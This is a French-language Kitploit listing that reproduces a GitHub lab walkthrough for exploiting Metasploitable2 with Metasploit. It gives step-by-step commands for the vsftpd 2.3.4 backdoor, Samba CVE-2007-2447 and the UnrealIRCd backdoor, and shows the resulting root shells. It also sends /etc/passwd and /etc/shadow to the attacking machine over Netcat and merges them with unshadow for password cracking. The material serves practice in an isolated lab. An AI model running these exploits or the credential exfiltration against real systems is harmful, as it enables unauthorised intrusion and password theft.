Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
metasploitable2-exploitation-metasploit — Walkthrough complet d'exploitation avec Metasploit contre Metasploitable2 — backdoor vsftpd, Samba CVE-2007-2447, backdoor UnrealIRCd, exfiltration Netcat et préparation au craquage d'identifiants. | Kitploit
Outils/GitHubGitHub/ethicalhackinglabs/metasploitable2-exploitation-metasploit
Cassage de Mots de PasseReconnaissanceFrameworks d'ExploitationCartographie RéseauAnalyse des VulnérabilitésExploitationExfiltration de DonnéesTests d'IntrusionCommandement et Contrôle

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Apprentissage et Éducation
Développement de Charges Utiles
Labs et Pratique
GitHubethicalhackinglabs/metasploitable2-exploitation-metasploit

metasploitable2-exploitation-metasploit

Walkthrough complet d'exploitation avec Metasploit contre Metasploitable2 — backdoor vsftpd, Samba CVE-2007-2447, backdoor UnrealIRCd, exfiltration Netcat et préparation au craquage d'identifiants.

Voir le dépôt
9il y a 2 moisPas encore vérifié

Exploitation de Metasploitable2 avec Metasploit : VSFTPD, Samba et plus encore

Un guide pratique pas à pas de l'exploitation à l'aide du Metasploit Framework — de la configuration de la base de données PostgreSQL et du scan db_nmap, en passant par trois shells root obtenus via vsftpd, Samba et UnrealIRCd, jusqu'à l'exfiltration d'identifiants avec Netcat.


Vue d'ensemble

Ce dépôt documente une campagne Metasploit complète contre Metasploitable2 dans un laboratoire VirtualBox isolé. Sujets abordés :

  • Configuration de Metasploit avec un backend PostgreSQL et des espaces de travail
  • Exécution de db_nmap pour enregistrer les résultats de scan directement dans la base de données
  • Exploitation de la porte dérobée vsftpd 2.3.4 (compromission de la chaîne d'approvisionnement)
  • Exploitation de Samba CVE-2007-2447 (injection de commande usermap_script)
  • Exfiltration de /etc/passwd et /etc/shadow via Netcat et fusion avec unshadow
  • Exploitation de la porte dérobée UnrealIRCd 3.2.8.1

Environnement de laboratoire

MachineRôleAdresse IP
Kali Linux 2026.1Attaquant192.168.1.4
Metasploitable2Cible192.168.1.3

Réseau : 192.168.1.0/24 — réseau NAT entièrement isolé dans VirtualBox.


Étape 1 — Configuration de Metasploit et scan avec base de données

root@kitploit:~
# Start PostgreSQL and initialize the database (one time only)
sudo systemctl start postgresql
sudo msfdb init

# Launch Metasploit
msfconsole

Kali et Metasploitable2 en cours d'exécution

Mise à jour de Kali et démarrage de PostgreSQL

root@kitploit:~
msf6> db_status           # Verify: Connected to msf. Connection type: postgresql.
msf6> workspace -a 178-metasploitable2
msf6> workspace           # Confirm active workspace

Sortie de db_status et workspace

root@kitploit:~
msf6> db_nmap -A 192.168.1.0/24 -n

Scan db_nmap en cours

root@kitploit:~
msf6> hosts
msf6> services

Sortie de hosts et services

Deux serveurs FTP trouvés sur Metasploitable2 :

PortServiceInfos
21/tcpftpvsftpd 2.3.4
2121/tcpftpProFTPD 1.3.1

Étape 2 — Exploitation de vsftpd 2.3.4 (porte dérobée)

En juillet 2011, l'archive source de vsftpd 2.3.4 a été compromise — une porte dérobée a été insérée et ouvre un shell root sur le port 6200 lorsque le nom d'utilisateur FTP contient :). CVE : CVE-2011-2523. Diff de code : https://pastebin.com/AetT9sS5

root@kitploit:~
msf6> search type:exploit name:vsftpd
# Result: exploit/unix/ftp/vsftpd_234_backdoor  (rank: excellent)

msf6> use exploit/unix/ftp/vsftpd_234_backdoor
msf6> info

Infos sur l'exploit vsftpd - partie 1

Infos sur l'exploit vsftpd - partie 2

vsftpd — affichage des options

vsftpd — définition de RHOSTS, RPORT et LHOST

root@kitploit:~
msf6> set RHOSTS 192.168.1.3
msf6> set RPORT 21
msf6> set LHOST 192.168.1.4
msf6> exploit

Exécution de l'exploit vsftpd et session Meterpreter

ls sur le système de fichiers root distant

root@kitploit:~
meterpreter> shell
whoami          # root
uname -a        # Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Sortie de whoami root et uname -a

Extraction des mots de passe hachés :

root@kitploit:~
cat /etc/shadow | grep '$1'

Mots de passe hachés du fichier shadow


Étape 3 — Exploitation de Samba CVE-2007-2447

Les versions Samba 3.0.0–3.0.25rc3 transmettent directement à /bin/sh les méta-caractères du shell contenus dans le champ nom d'utilisateur, via l'option username map script — avant même que l'authentification ait lieu. Metasploitable2 exécute Samba 3.0.20-Debian.

root@kitploit:~
msf6> search type:exploit name:samba
# ~7 exploits found

msf6> use exploit/multi/samba/usermap_script
msf6> info

Liste des exploits Samba résultant de la recherche

Infos sur usermap_script Samba

Description et références du CVE Samba

root@kitploit:~
msf6> set RHOSTS 192.168.1.3
msf6> exploit

Exécution de l'exploit Samba - session ouverte

whoami root et smbd --version sur le shell Samba

root@kitploit:~
whoami          # root
smbd --version  # Version 3.0.20-Debian

Exfiltration de fichiers via Netcat

Onglet 2 — Kali (réception) :

root@kitploit:~
nc -l -p 4567 > passwd.txt

Onglet 1 — Shell de l'exploit (envoi) :

root@kitploit:~
cat /etc/passwd | nc 192.168.1.4 4567

Écouteur Netcat sur Kali recevant passwd

Contenu de passwd.txt après exfiltration

Répétez l'opération pour /etc/shadow, puis fusionnez :

root@kitploit:~
unshadow passwd.txt shadow.txt > metasploitable_logins.txt
cat metasploitable_logins.txt

Étape 4 — Exploitation d'UnrealIRCd 3.2.8.1 (porte dérobée)

UnrealIRCd 3.2.8.1 a été distribué avec une porte dérobée dans son code source. L'envoi de AB sur le port 6667 amène le serveur à exécuter toute commande suivante en tant que root — aucune authentification n'est requise.

root@kitploit:~
msf6> use exploit/unix/irc/unreal_ircd_3281_backdoor
msf6> set payload cmd/unix/bind_netcat
msf6> set RHOSTS 192.168.1.3
msf6> set LHOST 192.168.1.4
msf6> set RPORT 6667
msf6> exploit

Options de l'exploit UnrealIRCd et exécution

Shell root UnrealIRCd - whoami et uname -a

root@kitploit:~
whoami   # root
uname -a # Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Options requises :


Aperçu du flux de travail Metasploit

root@kitploit:~
db_nmap → hosts → services → search → use → info → show options → set → exploit → shell

Erreurs courantes


Points clés à retenir

  • vsftpd 2.3.4 et UnrealIRCd 3.2.8.1 étaient tous deux des compromissions de la chaîne d'approvisionnement — des portes dérobées intégrées aux archives de distribution officielles
  • CVE-2007-2447 dans Samba se déclenche avant l'authentification — l'application du correctif est la seule mesure d'atténuation
  • Netcat ne requiert aucune dépendance et fonctionne pour l'exfiltration de fichiers sur pratiquement tout système Unix
  • info avant exploit est une habitude à prendre — cela affiche le CVE, les versions affectées et les options requises

🌐 Restons en contact

LinkedIn Dev.to

Télécharger l’outil
OptionValeurDescription
RHOSTS192.168.1.3IP de la cible
RPORT6667Port IRC par défaut
LHOST192.168.1.4IP d'écoute de Kali
payloadcmd/unix/bind_netcatBind shell via Netcat
ErreurCe qui se produitSolution
Ignorer msfdb initPas de base de données — les résultats de scan ne sont pas enregistrésExécutez sudo msfdb init une fois avant la première utilisation
Ne pas définir LHOSTLe shell inverse n'a nulle part où se connecter en retourDéfinissez toujours LHOST sur l'IP de votre Kali
Exécuter msfdb init à chaque sessionÉcrase les données existantesExécutez-le une seule fois ; vérifiez avec sudo msfdb status
Mauvais RPORTL'exploit échoue silencieusementConfirmez le port avec services avant de le définir
Fermer l'écouteur Netcat trop tôtTransfert de fichier tronquéAttendez un moment après la commande avec pipe avant CTRL-C
Ignorer unshadowLes craqueurs de mots de passe rejettent le format à fichiers séparésFusionnez toujours d'abord passwd + shadow